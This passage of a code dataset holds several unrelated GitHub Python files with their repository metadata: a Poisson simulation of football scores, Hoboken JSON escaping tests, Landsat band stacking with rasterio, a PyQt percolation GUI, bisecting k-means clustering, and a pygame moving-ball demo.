well.\ngroups = creategroups()\nmerged = groups[0].merge(groups[1], on=\"Team\").merge(groups[2], on=\"Team\").merge(groups[3], on=\"Team\")\n\n# After this we can see an outlook on wins and losses for all teams and analyse the data which is also helpful for Q1.1.\nprint(\"Data on wins/losses\")\nprint(merged)\n\n# We can also see the results on averages from the describe page\nprint(\"Averages of the wins/losses\")\nprint(merged.describe())\n\n\n# We can create a data structure containing information about the teams we care about. In this instance Manchester United and Manchester City.\n# This can help us answer Question 1 part 2.\nrteams = [\"Man United\", \"Man City\"] # Teams we care about\n\n# Creating a dictionary to store data for the relevant teams\nteams = {\"ManUnitedHome\": \"\", \"ManCityHome\": \"\", \"ManUnitedAway\": \"\", \"ManCityAway\": \"\"} # A dict to contain relevant team dataframes\n\n# Populate the data into the respective teams\nteams[\"ManUnitedHome\"] = data.loc[data[\"HomeTeam\"] == \"Man United\"]\nteams[\"ManUnitedAway\"] = data.loc[data[\"AwayTeam\"] == \"Man United\"]\nteams[\"ManCityHome\"] = data.loc[data[\"HomeTeam\"] == \"Man City\"]\nteams[\"ManCityAway\"] = data.loc[data[\"AwayTeam\"] == \"Man City\"]\n\n# Printing data for each team playing both home and away respectively.\nprint(\"Man United Home:\")\nprint(teams[\"ManUnitedHome\"].describe())\nprint(\"\\nMan City Home\")\nprint(teams[\"ManCityHome\"].describe())\nprint(\"-------------\")\nprint(\"Man United Away:\")\nprint(teams[\"ManUnitedAway\"].describe())\nprint(\"\\nMan City Away\")\nprint(teams[\"ManCityAway\"].describe())\n\n\n# To get a better visualisation of how these teams stack up against eachother we can plot these values onto a graph to\n# compare Manchester United's home defence against Manchester City's away offence and Manchester City's home defence\n# against Manchester United's away offence.\ndef plotstats(stat):\n assert isinstance(stat, list), 'Argument of wrong type!'\n fig = plt.figure(1)\n fig.set_size_inches(12, 8)\n for i in stat:\n plt.subplot(i.plots[0])\n i.df.boxplot(i.col, vert=False)\n plt.subplot(i.plots[1])\n temp = i.df[i.col].as_matrix()\n plt.hist(temp, bins=20, alpha=1, label=i.glabel)\n plt.xlabel(i.xlabel)\n plt.ylabel(i.ylabel)\n plt.legend()\n plt.xticks(np.arange(min(temp), max(temp)+1, 1.0))\n plt.yticks(np.arange(0, len(temp)+1, 1.0))\n plt.show()\n\n\n# We can create a simple object to use with the above function because it gives us a dynamic way of displaying information for different teams.\n# This is useful in plotting for multiple graphs in one go.\nclass PlotObject:\n def __init__(self, df, col, glabel, xlabel, ylabel, plots):\n self.df = df\n self.col = col\n self.glabel = glabel\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.plots = plots\n\n\n# We can then plot these teams and see how the data looks like. This will help answer Question 1 part 3.\n# Manchester United's home defence vs Manchester City's away offence\nobj = []\nobj.append(PlotObject(teams[\"ManUnitedHome\"], \"FTAG\", \"Man Utd Home\", \"Number of goals conceded\", \"Number of Matches\", [221,223]))\nobj.append(PlotObject(teams[\"ManCityAway\"], \"FTAG\", \"Man City Away\", \"Number of goals scored\", \"Number of Matches\", [222,224]))\nplotstats(obj)\n\n\n# Manchester City's home defence vs Manchester United's away offence\nobj = []\nobj.append(PlotObject(teams[\"ManCityHome\"], \"FTAG\", \"Man City Home\", \"Number of goals conceded\", \"Number of Matches\", [221, 223]))\nobj.append(PlotObject(teams[\"ManUnitedAway\"], \"FTAG\", \"Man Utd Away\", \"Number of goals scored\", \"Number of Matches\", [222, 224]))\nplotstats(obj)\n\n\n# ## Simulation\n# To simulate the future matches, we can use the poisson distribution to randomly generate future scores and see\n# how the teams stack up against eachother.\ndef sim_poisson(nums, mean):\n gen = np.random.poisson(lam = mean, size = nums)\n return gen\n\n\n# And then we can use this function to generate some scores for the following cases:\n# Man Utd Home vs Man City Away\n# Man City Home vs Man Utd Away\ndef generate_scores():\n gen_scores = []\n gen_scores.append(sim_poisson(1000, teams[\"ManUnitedHome\"][\"FTHG\"].mean()))\n gen_scores.append(sim_poisson(1000, teams[\"ManUnitedAway\"][\"FTAG\"].mean()))\n gen_scores.append(sim_poisson(1000, teams[\"ManCityHome\"][\"FTHG\"].mean()))\n gen_scores.append(sim_poisson(1000, teams[\"ManCityAway\"][\"FTAG\"].mean()))\n\n MUHVSMCA = list(map(list,zip(gen_scores[0],gen_scores[3])))\n MCHVSMUA = list(map(list,zip(gen_scores[2],gen_scores[1])))\n \n return {\"ManUtdHvsMC\": MUHVSMCA, \"ManCityHvsMU\": MCHVSMUA}\n\n# Then we generate these scores to get a dictionary of paired data.\ngenscores = generate_scores()\n\n\n# We can summarise this data by looking at who won each game.\n\n# Helper function to check for the winner given a result which would always be in the format (x,y) as per genscores.\ndef getresult(arr):\n if arr[0] > arr[1]:\n return \"H\"\n elif arr[0] < arr[1]:\n return \"A\"\n else:\n return \"D\"\n\n# Get a summary of wins\nManUtdHvsMC = [getresult(i) for i in (genscores[\"ManUtdHvsMC\"])]\nManCityHvsMU = [getresult(i) for i in (genscores[\"ManCityHvsMU\"])]\n\n# Split the simulated results into home and away stats.\nhome_stats = {\n \"MU Win\": Counter(ManUtdHvsMC)[\"H\"],\n \"MC Win\": Counter(ManCityHvsMU)[\"H\"],\n}\n\naway_stats = {\n \"MU Win\": Counter(ManCityHvsMU)[\"A\"],\n \"MC Win\": Counter(ManUtdHvsMC)[\"A\"],\n}\n\n# Handling draws appropriately as they will just be considered as one group regardless of what side they were playing on.\ndraws = Counter(ManCityHvsMU)[\"D\"] + Counter(ManUtdHvsMC)[\"D\"]\n\n# Get a summary of the data that has been modelled.\ndf = pd.DataFrame(home_stats, index=[\"Home\"])\ndf = df.append(pd.DataFrame(away_stats, index=[\"Away\"]))\nprint(\"Total number of simulations: \",len(ManUtdHvsMC)+len(ManCityHvsMU))\nprint(\"\\nWins/Losses simulated: \\n\",df)\nprint(\"\\nTotal draws in simulation: \",Counter(ManUtdHvsMC)[\"D\"] + Counter(ManCityHvsMU)[\"D\"])\n\n# Here we will be able to find probabilities of each team home and away and see who has a higher chance of winning on a certain side.\ndef findoverallprob(team):\n assert isinstance(team, str), 'Argument of wrong type!'\n\n total_matches = len(ManUtdHvsMC) + len(ManCityHvsMU)\n if team == \"MU\":\n team_win = home_stats[\"MU Win\"] + away_stats[\"MU Win\"]\n elif team == \"MC\":\n team_win = home_stats[\"MC Win\"] + away_stats[\"MC Win\"]\n elif team == \"D\":\n team_win = draws\n else:\n raise ValueError('Team must be either MU or MC.')\n return team_win/float(total_matches)\n\n\n# From this we can observe the following results:\n\n\nprint(\"Probablity of Manchester United winning: \", findoverallprob(\"MU\"))\nprint(\"Probablity of Manchester City winning: \", findoverallprob(\"MC\"))\nprint(\"Probability of drawing: \", findoverallprob(\"D\"))\n\n\n\n\ndef findprob(team, side):\n if side == \"home\":\n if team == \"MU\":\n total_matches = home_stats[\"MU Win\"] + away_stats[\"MC Win\"]\n return home_stats[\"MU Win\"]/float(total_matches)\n elif team == \"MC\":\n total_matches = home_stats[\"MC Win\"] + away_stats[\"MU Win\"]\n return home_stats[\"MC Win\"]/float(total_matches)\n elif side == \"away\":\n if team == \"MU\":\n total_matches = away_stats[\"MU Win\"] + home_stats[\"MC Win\"]\n return away_stats[\"MU Win\"]/float(total_matches)\n elif team == \"MC\":\n total_matches = away_stats[\"MC Win\"] + home_stats[\"MU Win\"]\n return away_stats[\"MC Win\"]/float(total_matches)\n else:\n raise ValueError('Side must be home or away')\n\n raise ValueError('Team must be either MU or MC.')\n\n\n\n# And we can see the following probabilities from this:\nprint(\"Probability of MU win given they play home: \", findprob(\"MU\", \"home\"))\nprint(\"Probability of MC win given they play home: \", findprob(\"MC\", \"home\"))\nprint(\"Probability of MU win given they play away: \", findprob(\"MU\", \"away\"))\nprint(\"Probability of MC win given they play away: \", findprob(\"MC\", \"away\"))\n\n\n# To verify our model we can pick another two teams at random and pair them up against eachother to see if our simulation model is a feasible\n# and reliable choice for predicting football scores. We will choose Chelsea and Arsenal for this test.\n\n# Get existing games played by both teams\nchelsea = [data.query(\"HomeTeam == 'Chelsea'\"), data.query(\"AwayTeam == 'Chelsea'\")]\narsenal = [data.query(\"HomeTeam == 'Arsenal'\"), data.query(\"AwayTeam == 'Arsenal'\")]\n\n# Describe the data to see how the teams have performed at home\nprint(chelsea[0].describe())\nprint(arsenal[0].describe())\n\n# And away\nprint(chelsea[1].describe())\nprint(arsenal[1].describe())\n\n# Get the actual result between the teams to compare with our simulation\nCHAW = data.query(\"AwayTeam == 'Arsenal' & HomeTeam == 'Chelsea'\")\nAHCW = data.query(\"AwayTeam == 'Chelsea' & HomeTeam == 'Arsenal'\")\n\n# Generate random games of Chelsea home and away\ng_CH = sim_poisson(10, chelsea[0][\"FTHG\"].mean())\ng_CA = sim_poisson(10, chelsea[1][\"FTAG\"].mean())\n\n# Generate random games of Arsenal home and away=\ng_AH = sim_poisson(10, arsenal[0][\"FTHG\"].mean())\ng_AA = sim_poisson(10, arsenal[1][\"FTAG\"].mean())\n\n\n# Combine these results as paired data.\nCHAA = zip(g_CH, g_AA)\nAHCA = zip(g_AH, g_CA)\n\n# And print out our findings to see what happened.\nprint(\"Chelsea Home vs Arsenal Away: \\n\")\nprint(\"Actual score: \", CHAW)\nprint(\"Simulated match results (C = chelsea win, A = Arsenal win, D = Draw): \", [\"C\" if getresult(x) == \"H\" else \"A\" if getresult(x) == \"A\" else \"D\" for x in CHAA])\n\nprint(\"\\n-------------------------\\n\")\n\nprint(\"Arsenal Home vs Chelsea Away: \\n\")\nprint(\"Actual score: \", AHCW)\nprint(\"Simulated match results (C = chelsea win, A = Arsenal win, D = Draw): \", [\"C\" if getresult(x) == \"H\" else \"A\" if getresult(x) == \"A\" else \"D\" for x in AHCA])","repo_name":"redrails/CO3093","sub_path":"CW1/CW1_mic7/CW1_mic7/Question_1_mic7.py","file_name":"Question_1_mic7.py","file_ext":"py","file_size_in_byte":12729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42853874250","text":"# -*- coding: utf-8 -*-\n\nfrom hoboken.ext.json_app import HobokenJsonApplication\n\nfrom hoboken.tests.compat import unittest\nfrom mock import patch, MagicMock\n\nfrom hoboken.six import u\n\nclass TestHobokenJsonApplication(unittest.TestCase):\n def setUp(self):\n self.app = HobokenJsonApplication('')\n\n def test_will_set_default_indent_config(self):\n self.assertIn('JSON_INDENT', self.app.config)\n\n def test_will_set_default_escape_config(self):\n self.assertEqual(self.app.config['JSON_ESCAPE'], True)\n\n def test_will_escape_string(self):\n val = b'escape me'.decode('latin-1')\n output = b'escape \\\\u003C/\\\\u003E me'.decode('latin-1')\n self.assertEqual(self.app.escape_string(val), output)\n\n def test_will_escape_unicode_seperators(self):\n # Value is u\"escape \\u2028 me\"\n val = b'escape \\xE2\\x80\\xA8 me'.decode('utf-8')\n output = b'escape \\\\u2028 me'.decode('latin-1')\n\n self.assertEqual(self.app.escape_string(val), output)\n\n # Value is u\"escape \\u2029 me\"\n val = b'escape \\xE2\\x80\\xA9 me'.decode('utf-8')\n output = b'escape \\\\u2029 me'.decode('latin-1')\n\n self.assertEqual(self.app.escape_string(val), output)\n\n def test_will_escape_bytes(self):\n val = b'escape me'\n output = b'escape \\\\u003C/\\\\u003E me'\n self.assertEqual(self.app.escape_string(val), output)\n\n def test_will_not_escape_if_requested(self):\n self.app.config['JSON_ESCAPE'] = False\n request_mock = MagicMock()\n response_mock = MagicMock()\n val = {'foo': 'dont escape me'}\n\n with patch('json.dumps', return_value='') as json_mock:\n self.app.on_returned_body(request_mock, response_mock, val)\n\n json_mock.assert_called_with(val, indent=self.app.config['JSON_INDENT'])\n\n def test_will_encapsulate_value(self):\n request_mock = MagicMock()\n response_mock = MagicMock()\n value = 'foobar'\n\n with patch('json.dumps', return_value='') as json_mock:\n self.app.on_returned_body(request_mock, response_mock, value)\n\n json_mock.assert_called_with({'value': value}, indent=self.app.config['JSON_INDENT'])\n\n def test_will_not_encapsulate_if_requested(self):\n self.app.config['JSON_WRAP'] = False\n\n request_mock = MagicMock()\n response_mock = MagicMock()\n value = b'some val'\n\n self.app.on_returned_body(request_mock, response_mock, value)\n self.assertEqual(value, response_mock.body)\n\n def test_will_handle_non_escapable(self):\n val = '{\"no_escape\": 0}'\n output = '{\"no_escape\": 0}'\n self.assertEqual(self.app.escape_string(val), output)\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestHobokenJsonApplication))\n\n return suite\n\n","repo_name":"andrew-d/Hoboken","sub_path":"hoboken/tests/test_ext.py","file_name":"test_ext.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"12355716803","text":"# %%\n\"\"\"\nPrepare for loading Landsat images\n\"\"\"\nimport rasterio\nfrom rasterio.io import DatasetReader\nfrom pathlib import Path\nfrom datetime import datetime\n\n\ndef open_landsat_file(\n satellite_number: str = \"L7\",\n level: int = 2,\n path: int = 190,\n start_row: int = 27,\n end_row: int = 27,\n aq_date: datetime = datetime(2007, 9, 14),\n file_type: str = \"B80\",\n) -> DatasetReader:\n # Folder where the Landsat images are located\n root_path = Path(__file__) / \"..\" / \"data1\" / \"LS7\" / \"LS2007\"\n\n # Construct filename from parameters\n filename = \"\".join(\n [\n satellite_number,\n f\"{level:01d}\",\n f\"{path:03d}\",\n f\"{start_row:03d}\",\n \"_\",\n f\"{end_row:03d}\",\n f\"{aq_date.strftime('%Y%m%d')}\",\n \"_\",\n file_type,\n \".TIF\",\n ]\n )\n\n # Open the file with rasterio (only reads header, does not load image data yet)\n return rasterio.open(root_path / filename)\n\n\n# %%\n\"\"\"\nLoad a panchromatic image and show its metadata\n\"\"\"\n\nband_8_pan = open_landsat_file(level=2, file_type=\"B80\")\nband_8_pan.meta\n\n# %%\n\"\"\"\nRead its image data and plot a subset\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nrow0, row1 = 9800, 11500\ncol0, col1 = 6500, 8000\nimage_data = band_8_pan.read(1, window=((row0, row1), (col0, col1)))\n\nplt.imshow(\n band_8_pan.read(1, window=((row0, row1), (col0, col1))),\n cmap=\"gray\",\n)\n\n# %%\n\"\"\"\nLayer stacking: Combine multiple bands into a single .img file\n\"\"\"\n\nband_1_bg = open_landsat_file(level=1, file_type=\"B10\")\nband_2_g = open_landsat_file(level=1, file_type=\"B20\")\nband_3_r = open_landsat_file(level=1, file_type=\"B30\")\nband_4_nir = open_landsat_file(level=1, file_type=\"B40\")\nband_5_mir1 = open_landsat_file(level=1, file_type=\"B50\")\nband_6_mir2 = open_landsat_file(level=2, file_type=\"B70\")\n\nmeta = band_1_bg.meta.copy()\nmeta[\"count\"] = 6\n\n# This will take a while\nwith rasterio.open(\"results/ls2007_ms_notir.img\", \"w\", **meta) as dest:\n dest.write(band_1_bg.read(1), 1)\n dest.write(band_2_g.read(1), 2)\n dest.write(band_3_r.read(1), 3)\n dest.write(band_4_nir.read(1), 4)\n dest.write(band_5_mir1.read(1), 5)\n dest.write(band_6_mir2.read(1), 6)\n\n# %%\n\"\"\"\nCreate a subset\n\"\"\"\n\n# Coordinates for group 2\nx0, y0 = 511920, 5326920\nx1, y1 = x0 + 18000, y0 + 18000\n\n# %%\n\"\"\"\nPlot the subset as panchromatic image\n\"\"\"\n\n# convert coordinates to pixel indices from the panchromatic image (x-axis is flipped!)\nrow0, col0 = band_8_pan.index(x0, y0)\nrow1, col1 = band_8_pan.index(x1, y1)\nwindow = ((row1, row0), (col0, col1))\nplt.imshow(band_8_pan.read(1, window=window), cmap=\"gray\")\n\n# %%\n\"\"\"\nPlot the subset as multispectral image\n\"\"\"\nimport numpy as np\n\n# convert coordinates to pixel indices from the multispectral image (x-axis is flipped!)\nrow0, col0 = band_1_bg.index(x0, y0)\nrow1, col1 = band_1_bg.index(x1, y1)\nwindow = ((row1, row0), (col0, col1))\n\n# create an rgb image from BG, G and R bands\nrgb = np.dstack(\n [\n band_1_bg.read(1, window=window),\n band_2_g.read(1, window=window),\n band_3_r.read(1, window=window),\n ]\n)\n\nplt.imshow(rgb)\n\n\n# %%\n","repo_name":"pothos-dev/study","sub_path":"Fernerkundung/ue3.py","file_name":"ue3.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34834058806","text":"from PyQt6.QtWidgets import QMainWindow, QSpinBox, QWidget, QPushButton, QGridLayout, QSlider, QLabel\nfrom PyQt6.QtCore import Qt\nfrom src.painter import Painter\nfrom src.percolador import percolar\nimport random\n\nclass Window(QMainWindow):\n\t\"\"\"Widget que representa mi ventana principal\"\"\"\n\n\t# Declaración de los widgets\n\t__SBTam=None\n\t__painter=None\n\t__botonGenerarMatriz=None\n\t__SLProbabilidad=None\n\t__botonPercolar=None\n\t__labelPercolacion=None\n\t__labelProbabilidad=None\n\t__labelTamMatriz=None\n\n\t# Declaración de las variables\n\t__title=None\n\t__top=None\n\t__left=None\n\t__width=None\n\t__height=None\n\t__matriz=None\n\t__tam=0\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\t# Inicializacion de variables\n\t\tself.__title=\"Percolación\"\n\t\tself.__top=150\n\t\tself.__left=150\n\t\tself.__width=500\n\t\tself.__height=350\n\n\t\t# Inicializacion de widgets\n\t\tself.__SBTam=QSpinBox()\n\t\tself.__painter=Painter()\n\t\tself.__botonGenerarMatriz=QPushButton()\n\t\tself.__botonPercolar=QPushButton()\n\t\tself.__SLProbabilidad=QSlider()\n\t\tself.__labelPercolacion=QLabel(\"\")\n\t\tself.__labelTamMatriz=QLabel(\"Tamaño de la matriz:\")\n\t\tself.__labelProbabilidad=QLabel(\"Probabilidad:\")\n\n\t\t# Geometria de la ventana principal\n\t\tself.setWindowTitle(self.__title)\n\t\tself.setGeometry(self.__top, self.__left, self.__width, self.__height)\n\n\t\t# declaro e inicializo el widget central y el layout\n\t\twidgetCentral=QWidget(self)\n\t\tlayout=QGridLayout()\n\n\t\t# Configuracion del layout\n\t\tlayout.setAlignment(Qt.AlignmentFlag.AlignHCenter)\n\n\t\t# Configuraciones del SpinBox tamaño matriz\n\t\tself.__SBTam.setGeometry(500-120, 0, 120, 20)\n\t\tself.__SBTam.setMaximum(50)\n\t\tself.__SBTam.setMinimum(10)\n\n\t\t# Configuraciones del slider probabilidad\n\t\tself.__SLProbabilidad.setOrientation(Qt.Orientation.Horizontal)\n\t\tself.__SLProbabilidad.setMaximum(10)\n\t\tself.__SLProbabilidad.setMinimum(1)\n\t\tself.__SLProbabilidad.setPageStep(1)\n\t\tself.__SLProbabilidad.setMinimumSize(120, 20)\n\t\tself.__SLProbabilidad.setMaximumSize(400, 20)\n\t\tself.__SLProbabilidad.setValue(4)\n\n\t\t# Configuraciones del label percolacion\n\t\tself.__labelPercolacion.setMaximumSize(500,20)\n\n\t\t# Configuraciones del label tamaño matriz\n\t\tself.__labelTamMatriz.setMaximumSize(150,20)\n\n\t\t# Configuraciones del label probabilidad\n\t\tself.__labelProbabilidad.setMaximumSize(150,20)\n\n\t\t# Configuraciones del painter\n\t\tself.__painter.setGeometry(0, 0, 300, 300)\n\n\t\t# Configuraciones del botonGenerarMatriz\n\t\tself.__botonGenerarMatriz.setGeometry(500-120, 35, 120, 20)\n\t\tself.__botonGenerarMatriz.setText(\"Generar Matriz\")\n\n\t\t# Configuraciones del botonPercolar\n\t\tself.__botonPercolar.setMaximumSize(400, 20)\n\t\tself.__botonPercolar.setMinimumSize(120, 20)\n\t\tself.__botonPercolar.setText(\"Percolar\")\n\t\tself.__botonPercolar.setEnabled(False)\n\n\t\t# Conexiones\n\t\tself.__botonGenerarMatriz.clicked.connect(self._BotonGenerarMatriz)\n\t\tself.__botonPercolar.clicked.connect(self._BotonPercolar)\n\n\t\t# Agrego los widgets al layout\n\t\tlayout.addWidget(self.__painter, 0, 0, 7, 1)\n\t\tlayout.addWidget(self.__labelPercolacion, 8, 0, 1, 1)\n\t\tlayout.addWidget(self.__labelTamMatriz, 0, 1, 1, 1)\n\t\tlayout.addWidget(self.__SBTam, 1, 1, 1, 1)\n\t\tlayout.addWidget(self.__labelProbabilidad, 2, 1, 1, 1)\n\t\tlayout.addWidget(self.__SLProbabilidad, 3, 1, 1, 1)\n\t\tlayout.addWidget(self.__botonGenerarMatriz, 4, 1, 1, 1)\n\t\tlayout.addWidget(self.__botonPercolar, 5, 1, 1, 1)\n\t\tlayout.setColumnStretch(0, 3)\n\t\tlayout.setRowStretch(8, 0)\n\n\t\t# Configuraciones del widget central y del layout\n\t\twidgetCentral.setLayout(layout)\n\t\tself.setCentralWidget(widgetCentral)\n\n\tdef _BotonGenerarMatriz(self):\n\t\tself.__tam=self.__SBTam.value()\n\t\tself.__matriz=[ [ None for y in range(self.__tam) ] for x in range(self.__tam) ]\n\t\tprobabilidad=self.__SLProbabilidad.value()/10\n\n\t\tfor i in range(0,self.__tam):\n\t\t\tfor j in range(0, self.__tam):\n\t\t\t\t#Genera un numero aleatorio entre 0 y 10 que dividido 10 nos da un valor entre 0 y 1\n\t\t\t\tif(random.randrange(0, 10)/10.0 <= probabilidad):\n\t\t\t\t\tself.__matriz[i][j] = 0\n\t\t\t\telse:\n\t\t\t\t\tself.__matriz[i][j] = 1\n\n\t\tself.__painter.setMatriz(self.__matriz)\n\n\t\tself.__labelPercolacion.setText(\"\")\n\n\t\tself.__botonPercolar.setEnabled(True)\n\n\tdef _BotonPercolar(self):\n\n\t\tflag, self.__matriz=percolar(self.__matriz)\n\n\t\tself.__painter.update()\n\n\t\tif(flag):\n\t\t\tself.__labelPercolacion.setStyleSheet(\"color: green; font-weight: bold\")\n\t\t\tself.__labelPercolacion.setText(\"Hay percolación ✓\")\n\t\telse:\n\t\t\tself.__labelPercolacion.setStyleSheet(\"color: red; font-weight: bold\")\n\t\t\tself.__labelPercolacion.setText(\"No hay percolación ❌\")\n\n\t\tself.__botonPercolar.setEnabled(False)","repo_name":"UF-LP2/.github","sub_path":"Interfaz_Grafica_PyQt/PercolacionRecursiva/src/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4958380729","text":"import numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom numpy.linalg import norm\nfrom collections import Counter, defaultdict\nimport matplotlib.pyplot as plt\nfrom scipy.sparse import csr_matrix, find\nfrom sklearn.metrics import calinski_harabaz_score\nfrom scipy.spatial.distance import euclidean\nfrom sklearn.decomposition import TruncatedSVD\nimport click\nimport logging\nfrom pathlib import Path\nfrom dotenv import find_dotenv, load_dotenv\nfrom sklearn.utils import shuffle\n\n\n# reading the file and generating the csr matrix\ndef csr_read(fname, ftype=\"csr\", nidx=1):\n \n \n with open(fname) as f:\n lines = f.readlines()\n \n if ftype == \"clu\":\n p = lines[0].split()\n nrows = int(p[0])\n ncols = int(p[1])\n nnz = long(p[2])\n lines = lines[1:]\n assert(len(lines) == nrows)\n elif ftype == \"csr\":\n nrows = len(lines)\n ncols = 0 \n nnz = 0 \n for i in xrange(nrows):\n p = lines[i].split()\n if len(p) % 2 != 0:\n raise ValueError(\"Invalid CSR matrix. Row %d contains %d numbers.\" % (i, len(p)))\n nnz += len(p)/2\n for j in xrange(0, len(p), 2): \n cid = int(p[j]) - nidx\n if cid+1 > ncols:\n ncols = cid+1\n else:\n raise ValueError(\"Invalid sparse matrix ftype '%s'.\" % ftype)\n val = np.zeros(nnz, dtype=np.float)\n ind = np.zeros(nnz, dtype=np.int)\n ptr = np.zeros(nrows+1, dtype=np.long)\n n = 0 \n for i in xrange(nrows):\n p = lines[i].split()\n for j in xrange(0, len(p), 2): \n ind[n] = int(p[j]) - nidx\n val[n] = float(p[j+1])\n n += 1\n ptr[i+1] = n \n \n assert(n == nnz)\n \n return csr_matrix((val, ind, ptr), shape=(nrows, ncols), dtype=np.float)\n\n\n#scales the matrix by frequency of the terms.\ndef csr_idf(mat, copy=False, **kargs):\n \n if copy is True:\n mat = mat.copy()\n nrows = mat.shape[0]\n nnz = mat.nnz\n ind, val, ptr = mat.indices, mat.data, mat.indptr\n # document frequency\n df = defaultdict(int)\n for i in ind:\n df[i] += 1\n # inverse document frequency\n for k,v in df.items():\n df[k] = np.log(nrows / float(v)) ## df turns to idf - reusing memory\n # scale by idf\n for i in range(0, nnz):\n val[i] *= df[ind[i]]\n \n return df if copy is False else mat\n\n \n#normalizing the csr matrix\ndef csr_l2normalize(mat, copy=False, **kargs):\n \n if copy is True:\n mat = mat.copy()\n nrows = mat.shape[0]\n nnz = mat.nnz\n ind, val, ptr = mat.indices, mat.data, mat.indptr\n for i in range(nrows):\n rsum = 0.0 \n for j in range(ptr[i], ptr[i+1]):\n rsum += val[j]**2\n if rsum == 0.0:\n continue # do not normalize empty rows\n rsum = float(1.0/np.sqrt(rsum))\n for j in range(ptr[i], ptr[i+1]):\n val[j] *= rsum\n \n if copy is True:\n return mat\n\n\n\n\n\n# computing the centroids for the clusters\ndef findCentroids(mat, idx, k=2):\n centroids = list()\n for i in range(1,k+1):\n indi = [j for j, x in enumerate(idx) if x == i]\n members = mat[indi,:]\n if (members.shape[0] > 1):\n centroids.append(members.toarray().mean(0))\n \n centroids_csr = csr_matrix(centroids)\n return centroids_csr\n\n\n#finding the appropriate clusters\ndef findCluster(mat, centroids):\n idx = list()\n similarityMatrix = mat.dot(centroids.T)\n\n for i in range(similarityMatrix.shape[0]):\n row = similarityMatrix.getrow(i).toarray()[0].ravel()\n top_indices = row.argsort()[-1]\n idx.append(top_indices + 1)\n return idx\n\n# normal kmeans algorithm\ndef kmeans(mat,matrix, index_list, k):\n \n init_centroids_index = index_list[:2]\n centroids = mat[[init_centroids_index[0],init_centroids_index[1]],:]\n for itr in range(25):\n print(\"Iteration \" + str(itr) + \"\\n\")\n idx = findCluster(matrix,centroids)\n centroids = findCentroids(matrix,idx)\n index_list1 = []\n index_list2 = []\n for i in range(len(idx)):\n if idx[i] == 1:\n index_list1.append(index_list[i])\n elif idx[i] == 2:\n index_list2.append(index_list[i])\n cluster1 = mat[index_list1,:]\n cluster2 = mat[index_list2,:]\n return index_list1, index_list2, cluster1, cluster2, centroids[0], centroids[1]\n\n\n#bisecting k-means algorithm \ndef bisect(mat, k):\n matrix = mat\n cluster_list = []\n index_list = []\n\n for i in range(mat.shape[0]):\n index_list.append(i)\n\n while len(cluster_list) < k:\n sse1 = 0\n sse2 = 0\n index_list1, index_list2, cluster1, cluster2, centroids1, centroids2 = kmeans(mat,matrix,index_list,2)\n for clusters in cluster1:\n sse1 += (euclidean(clusters.toarray(),centroids1.toarray()))**2\n for clusters in cluster2:\n sse2 += (euclidean(clusters.toarray(),centroids2.toarray()))**2 \n if sse1 < sse2:\n cluster_list.append(index_list1)\n index_list = index_list2\n matrix = cluster2\n else:\n cluster_list.append(index_list2)\n index_list = index_list1\n matrix = cluster1\n cluster_list.append(index_list)\n return cluster_list\n\n\n\n# matrix = csr_read(\"train.dat\")\n# mat2 = csr_idf(matrix, copy=True) # after idf \n# mat3 = csr_l2normalize(mat2, copy=True) # idf and normalize\n\n# output = [0]* matrix.shape[0]\n# k=7\n# svd = TruncatedSVD(n_components=500, n_iter=50, random_state=42,algorithm='arpack')\n# csrnorm_trunc=svd.fit_transform(mat3)\n# csrnorm_trunc= csr_matrix(csrnorm_trunc)\n# result = bisect(csrnorm_trunc,k)\n\n# for i in range(len(result)):\n# for j in range(len(result[i])):\n# output[result[i][j]] = i+1\n\n# print(\"Accuracy Score: \")\n# print(calinski_harabaz_score(matrix.toarray(),output))\n\n# if(k==7):\n# f = open(\"result_2.dat\", \"w\")\n# f.write(\"\\n\".join(map(lambda x: str(x), output)))\n# f.close()\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"goelshivani321/Implementing-Bisecting-K-means-Algorithm-","sub_path":"src/models/train_model_v2.py","file_name":"train_model_v2.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35854453904","text":"import pygame\npygame.init()\n\nWIDTH = 500\nHEIGHT = 500\n\nFPS = 20\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\n\nx, y = WIDTH // 2 , HEIGHT // 2\nstep = 20\nRAD = 25\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"RED_BALL\")\n\nclock = pygame.time.Clock()\n\nfinished = False\nwhile not finished:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n screen.fill(WHITE)\n pygame.draw.circle(screen, RED, (x, y), RAD)\n\n\n pressed = pygame.key.get_pressed()\n if pressed[pygame.K_UP] and y - RAD - 15 >= 0: \n y -= step\n if pressed[pygame.K_DOWN] and y + RAD + 15 <= HEIGHT:\n y += step\n if pressed[pygame.K_LEFT] and x - RAD - 15 >= 0:\n x -= step\n if pressed[pygame.K_RIGHT] and x + RAD + 15 <= WIDTH:\n x += step\n \n \n pygame.display.flip()\npygame.quit()\n","repo_name":"SamSweet04/PP2","sub_path":"Lab7/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20355674492","text":"# -*- coding: utf-8 -*-\nfrom __future__ import 